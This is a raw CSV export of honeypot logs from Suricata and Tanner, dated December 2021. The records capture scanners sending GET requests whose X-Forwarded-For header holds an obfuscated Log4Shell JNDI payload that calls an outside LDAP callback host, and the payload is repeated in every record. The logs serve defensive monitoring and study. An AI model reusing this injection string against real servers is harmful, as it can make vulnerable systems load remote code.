Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""d316e1622c58825727e7e4e6c954d289"",""stored"":false,""size"":7886,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:30:02.627752+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:30:02.627Z",1,DxZavH0B5e7x5EYnxy0l,"logstash-suricata-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1069742929081953,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.202.163","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,cf47c22e327e,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",5374414,,"{""timestamp"":""2021-12-15T04:30:02.627752+0000"",""flow_id"":1069742929081953,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.202.163"",""src_port"":39574,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.202.163",39574,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:30:02.627752+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T04:30:02.461Z",1,"-3havH0B6VkG8jKzy-oU","logstash-tanner-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"2bcf7260-1190-4903-970d-5adfabe67d2f",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.202.163","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=2bcf7260-1190-4903-970d-5adfabe67d2f",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",cf47c22e327e,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",3095,,"{""method"": ""GET"", ""path"": ""/favicon.ico?1528612569"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=2bcf7260-1190-4903-970d-5adfabe67d2f""}, ""uuid"": ""fdb1314b-0175-41ef-a74e-23b775da8833"", ""peer"": {""ip"": ""138.197.202.163"", ""port"": 39574}, ""status"": 200, ""cookies"": {""sess_uuid"": ""2bcf7260-1190-4903-970d-5adfabe67d2f""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""ed6487f2-73c5-488b-b42a-d5cf402368d8""}}}, ""timestamp"": ""2021-12-15T04:30:02.461662""}",,,,,,GET,,,,,,"/favicon.ico?1528612569",,,,,,,,,,,index,1,1,"0.6.0","ed6487f2-73c5-488b-b42a-d5cf402368d8","0.6.0",,,,,,,,,,,,,,,,,,"138.197.202.163",39574,,,,,,,,,200,,,rawcoast,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:30:02.461662",,,,,,,,,Tanner,,,"fdb1314b-0175-41ef-a74e-23b775da8833",
"2021-12-15T04:30:02.417Z",1,DRZavH0B5e7x5EYnxy0l,"logstash-suricata-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1069742929081953,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.202.163","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,cf47c22e327e,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",5372940,,"{""timestamp"":""2021-12-15T04:30:02.417602+0000"",""flow_id"":1069742929081953,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.202.163"",""src_port"":39574,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":1,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.202.163",39574,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:30:02.417602+0000",,,,,,,,1,Suricata,,,,
"2021-12-15T04:30:02.417Z",1,DhZavH0B5e7x5EYnxy0l,"logstash-suricata-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.202.163",39574,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"HTML document, ASCII text",27a505e858e000b7a478dfde26bf8378,"[]",446,CLOSED,false,1,,,,,,,1069742929081953,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,cf47c22e327e,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",446,"HTTP/1.1",404,"/favicon.ico",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",5373592,,"{""timestamp"":""2021-12-15T04:30:02.417602+0000"",""flow_id"":1069742929081953,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.202.163"",""dest_port"":39574,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":404,""length"":446},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""HTML document, ASCII text"",""gaps"":false,""state"":""CLOSED"",""md5"":""27a505e858e000b7a478dfde26bf8378"",""stored"":false,""size"":446,""tx_id"":1}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:30:02.417602+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:30:02.239Z",1,"-nhavH0B6VkG8jKzy-oU","logstash-tanner-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"2bcf7260-1190-4903-970d-5adfabe67d2f",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.202.163","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=2bcf7260-1190-4903-970d-5adfabe67d2f",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",cf47c22e327e,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",2210,,"{""method"": ""GET"", ""path"": ""/favicon.ico"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=2bcf7260-1190-4903-970d-5adfabe67d2f""}, ""uuid"": ""fdb1314b-0175-41ef-a74e-23b775da8833"", ""peer"": {""ip"": ""138.197.202.163"", ""port"": 39574}, ""status"": 200, ""cookies"": {""sess_uuid"": ""2bcf7260-1190-4903-970d-5adfabe67d2f""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""ed6487f2-73c5-488b-b42a-d5cf402368d8""}}}, ""timestamp"": ""2021-12-15T04:30:02.239680""}",,,,,,GET,,,,,,"/favicon.ico",,,,,,,,,,,index,1,1,"0.6.0","ed6487f2-73c5-488b-b42a-d5cf402368d8","0.6.0",,,,,,,,,,,,,,,,,,"138.197.202.163",39574,,,,,,,,,200,,,rawcoast,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:30:02.239680",,,,,,,,,Tanner,,,"fdb1314b-0175-41ef-a74e-23b775da8833",
"2021-12-15T04:30:01.827Z",1,ChZavH0B5e7x5EYnxy0l,"logstash-suricata-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1069742929081953,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.202.163","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,,,,,,,,,,,,cf47c22e327e,"gzip, deflate",,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",5370649,,"{""timestamp"":""2021-12-15T04:30:01.827721+0000"",""flow_id"":1069742929081953,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""138.197.202.163"",""src_port"":39574,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":0,""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"138.197.202.163",39574,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:30:01.827721+0000",,,,,,,,0,Suricata,,,,
"2021-12-15T04:30:01.827Z",1,CxZavH0B5e7x5EYnxy0l,"logstash-suricata-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"138.197.202.163",39574,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/",false,"HTML document, Unicode text, UTF-8 text, with very long lines (488)",a11b96dc89694dc220111a6d8a9ab389,"[]",4019,CLOSED,false,0,,,,,,,1069742929081953,,,"Frankfurt am Main",EU,DE,DE,Germany,,"172.16.0.42","50.1155","{""lon"":8.6842,""lat"":50.1155}","8.6842",60313,HE,Hesse,"Europe/Berlin",,,,,,,,,,,,,,,cf47c22e327e,,,,,"172.16.0.42","text/html",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",4019,"HTTP/1.1",200,"/",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",5371291,,"{""timestamp"":""2021-12-15T04:30:01.827721+0000"",""flow_id"":1069742929081953,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""138.197.202.163"",""dest_port"":39574,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""text/html"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":4019},""app_proto"":""http"",""fileinfo"":{""filename"":""/"",""sid"":[],""magic"":""HTML document, Unicode text, UTF-8 text, with very long lines (488)"",""gaps"":false,""state"":""CLOSED"",""md5"":""a11b96dc89694dc220111a6d8a9ab389"",""stored"":false,""size"":4019,""tx_id"":0}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,rawcoast,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied"",""_geoip_lookup_failure""]",,,,"2021-12-15T04:30:01.827721+0000",,,,,,,,,Suricata,,,,
"2021-12-15T04:30:01.249Z",1,"-XhavH0B6VkG8jKzy-oU","logstash-tanner-2021.12.15",,"_doc","bfef6616-2b38-4fa6-8e90-ec99ad931ae5",cf47c22e327e,"ddfbf2f0-c8c7-4b2c-8b34-0d09a985408a",cf47c22e327e,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Digital Ocean, Inc.",14061,"Santa Clara",NA,US,US,"United States",807,"138.197.202.163","37.3417","{""lon"":-121.9753,""lat"":37.3417}","-121.9753",95051,CA,California,"America/Los_Angeles",,,,"*/*","gzip, deflate",,,"keep-alive",,,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",cf47c22e327e,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",1430,,"{""method"": ""GET"", ""path"": ""/"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}""}, ""uuid"": ""fdb1314b-0175-41ef-a74e-23b775da8833"", ""peer"": {""ip"": ""138.197.202.163"", ""port"": 39574}, ""status"": 200, ""cookies"": {""sess_uuid"": null}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""2bcf7260-1190-4903-970d-5adfabe67d2f""}}}, ""timestamp"": ""2021-12-15T04:30:01.249734""}",,,,,,GET,,,,,,"/",,,,,,,,,,,index,1,1,"0.6.0","2bcf7260-1190-4903-970d-5adfabe67d2f","0.6.0",,,,,,,,,,,,,,,,,,"138.197.202.163",39574,,,,,,,,,200,,,rawcoast,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T04:30:01.249734",,,,,,,,,Tanner,,,"fdb1314b-0175-41ef-a74e-23b775da8833",
"2021-12-15T03:20:49.613Z",1,GqgbvH0BCXMCNTQLZMZG,"logstash-suricata-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,http,,,,,,"64.227.188.216",35380,,,"1.6.0",,fileinfo,,,,,,,,,,,,,,,,,,,,,,,"/favicon.ico",false,"MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel",d316e1622c58825727e7e4e6c954d289,"[]",7886,CLOSED,false,2,,,,,,,1470014281374592,"The Procter and Gamble Company",11003,,NA,US,US,"United States",,"172.16.0.42","37.751","{""lon"":-97.822,""lat"":37.751}","-97.822",,,,"America/Chicago",,,,,,,,,,,,,,,b8fefb716c89,,,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",170010089,,"{""timestamp"":""2021-12-15T03:20:49.613931+0000"",""flow_id"":1470014281374592,""in_iface"":""eth0"",""event_type"":""fileinfo"",""src_ip"":""172.16.0.42"",""src_port"":80,""dest_ip"":""64.227.188.216"",""dest_port"":35380,""proto"":""TCP"",""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886},""app_proto"":""http"",""fileinfo"":{""filename"":""/favicon.ico"",""sid"":[],""magic"":""MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 24x24, 32 bits/pixel"",""gaps"":false,""state"":""CLOSED"",""md5"":""d316e1622c58825727e7e4e6c954d289"",""stored"":false,""size"":7886,""tx_id"":2}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,,,,,,,,,,alertgemini,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:49.613931+0000",,,,,,,,,Suricata,,,,
"2021-12-15T03:20:49.613Z",1,GagbvH0BCXMCNTQLZMZG,"logstash-suricata-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,,"172.16.0.42",80,,,"1.6.0",,http,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1470014281374592,"Peer 1 Network (USA) Inc.",13768,Jacksonville,NA,US,US,"United States",561,"64.227.188.216","30.1426","{""lon"":-81.5727,""lat"":30.1426}","-81.5727",32258,FL,Florida,"America/New_York",,,,,,,,,,,,,,,b8fefb716c89,"gzip, deflate",,,,"172.16.0.42","image/x-icon",GET,,,,,,,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36",7886,"HTTP/1.1",200,"/favicon.ico?1528612569",,"${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",,,eth0,log,,,,,,,,"/data/suricata/log/eve.json",170009423,,"{""timestamp"":""2021-12-15T03:20:49.613931+0000"",""flow_id"":1470014281374592,""in_iface"":""eth0"",""event_type"":""http"",""src_ip"":""64.227.188.216"",""src_port"":35380,""dest_ip"":""172.16.0.42"",""dest_port"":80,""proto"":""TCP"",""tx_id"":2,""http"":{""hostname"":""172.16.0.42"",""url"":""/favicon.ico?1528612569"",""http_user_agent"":""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"",""xff"":""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"",""http_content_type"":""image/x-icon"",""accept_encoding"":""gzip, deflate"",""http_method"":""GET"",""protocol"":""HTTP/1.1"",""status"":200,""length"":7886}}",,,,,,,,,,,,,,,TCP,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"64.227.188.216",35380,,,,,,,,,,,,alertgemini,"172.16.0.42","172.16.0.42","[""suricata"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:49.613931+0000",,,,,,,,2,Suricata,,,,
"2021-12-15T03:20:49.357Z",1,CqgbvH0BCXMCNTQLYMZ6,"logstash-tanner-2021.12.15",,"_doc","2b74f35c-7a7b-4007-8b90-f00473e26cc9",b8fefb716c89,"2cb0921b-8bb9-4665-9a8e-4ac699536dca",b8fefb716c89,filebeat,"7.11.1",,,,,,,,,,,,,,,,,,,,,"8edbfc7f-8215-42c8-aa2b-9823344c6a85",,80,,,"1.6.0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"Peer 1 Network (USA) Inc.",13768,Jacksonville,NA,US,US,"United States",561,"64.227.188.216","30.1426","{""lon"":-81.5727,""lat"":30.1426}","-81.5727",32258,FL,Florida,"America/New_York",,,,"*/*","gzip, deflate",,,"keep-alive","sess_uuid=8edbfc7f-8215-42c8-aa2b-9823344c6a85",,"172.16.0.42",,"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36","${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}",b8fefb716c89,,,,,,,,,,,,,,,,,,,,,,,,log,,,,,,,,"/data/tanner/log/tanner_report.json",97138,,"{""method"": ""GET"", ""path"": ""/favicon.ico?1528612569"", ""headers"": {""host"": ""172.16.0.42"", ""user-agent"": ""Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"", ""accept-encoding"": ""gzip, deflate"", ""accept"": ""*/*"", ""connection"": ""keep-alive"", ""x-forwarded-for"": ""${jndi:${lower:l}${lower:d}a${lower:p}://xf.world80.log4j.bin${upper:a}ryedge.io:80/callback}"", ""cookie"": ""sess_uuid=8edbfc7f-8215-42c8-aa2b-9823344c6a85""}, ""uuid"": ""fe9c8b83-57b9-4768-9667-b1206216ed38"", ""peer"": {""ip"": ""64.227.188.216"", ""port"": 35380}, ""status"": 200, ""cookies"": {""sess_uuid"": ""8edbfc7f-8215-42c8-aa2b-9823344c6a85""}, ""response_msg"": {""version"": ""0.6.0"", ""response"": {""message"": {""detection"": {""name"": ""index"", ""order"": 1, ""type"": 1, ""version"": ""0.6.0""}, ""sess_uuid"": ""b42c6cf6-9547-48e2-b262-50240394a558""}}}, ""timestamp"": ""2021-12-15T03:20:49.357366""}",,,,,,GET,,,,,,"/favicon.ico?1528612569",,,,,,,,,,,index,1,1,"0.6.0","b42c6cf6-9547-48e2-b262-50240394a558","0.6.0",,,,,,,,,,,,,,,,,,"64.227.188.216",35380,,,,,,,,,200,,,alertgemini,"172.16.0.42","172.16.0.42","[""tanner"",""beats_input_codec_plain_applied""]",,,,"2021-12-15T03:20:49.357366",,,,,,,,,Tanner,,,"fe9c8b83-57b9-4768-9667-b1206216ed38",
